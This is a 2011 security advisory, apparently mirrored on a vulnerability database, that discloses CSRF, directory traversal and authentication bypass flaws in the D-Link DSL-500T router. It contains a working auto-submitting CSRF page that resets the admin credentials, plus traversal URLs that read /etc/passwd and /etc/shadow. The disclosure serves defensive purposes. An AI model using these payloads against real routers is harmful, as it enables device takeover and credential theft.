Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27475
HistoryDec 26, 2011 - 12:00 a.m.

CSRF, DT and AB vulnerabilities in D-Link DSL-500T ADSL Router

2011-12-2600:00:00
vulners.com
37
JSON

Hello 3APA3A!

I want to warn you about new security vulnerabilities in D-Link DSL-500T ADSL Router. Which I've found and disclosed last week.

These are Cross-Site Request Forgery, Directory Traversal and Authentication Bypass vulnerabilities. This is my fifth advisory (#3 and #4 were announced and will be disclosed later, after giving the time for D-Link to fix those vulnerabilities) from series of advisories about vulnerabilities in D-Link products.

CSRF (WASC-09):

All functionality of admin panel of the router has CSRF vulnerabilities. For example, the next CSRF-request allows to change login and password of administrator.

D-Link DSL-500T CSRF.html

<html>
<head>
<title>D-Link DSL-500T CSRF exploit (C) 2011 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.1.1/cgi-bin/webcm&quot; method="post" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="getpage" value="…/html/tools/usrmgmt.htm">
<input type="hidden" name="security:settings/username" value="admin">
<input type="hidden" name="security:settings/password" value="password">
<input type="hidden" name="security:settings/password_confirm" value="password">
<input type="hidden" name="security:settings/idle_timeout" value="30">
</form>
</body>
</html>

All other functions in admin panel are also vulnerable to CSRF. And if to use XSS and DT, then it'll be possible to remotely read arbitrary files from the router.

Directory Traversal (WASC-33):

In 2006 in other models of D-Link's routers DT vulnerability was found (CVE-2006-2337). It also exists in this model, as I've checked (but as opposed to the description of DT in other models, in my model the authentication is required).

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

It's possible to read arbitrary files from the router. But this vulnerability works only after authentication.

Authentication Bypass (WASC-01):

In 2005 in other models of D-Link's routers AB vulnerability was found (CVE-2005-1680). It also exists in this model, as I've checked.

It's possible to send commands to application firmwarecfg without authentication. Which allows e.g. to receive configuration file with login and password of administrator. For getting access to admin panel.

Vulnerable is the next model: D-Link DSL-500T, Firmware V1.00B02T02.RU.20050223. This model with other firmware versions is also vulnerable, and also other models of routers from D-Link can be vulnerable.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5581/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Related

cve 2
prion 1
cve
cve
CVE-2006-2337
2006-05-12 00:02:00
CVE-2005-1680
2005-05-20 04:00:00
prion
prion
Directory traversal
2006-05-12 00:02:00
JSON
Related for SECURITYVULNS:DOC:27475
cve2prion1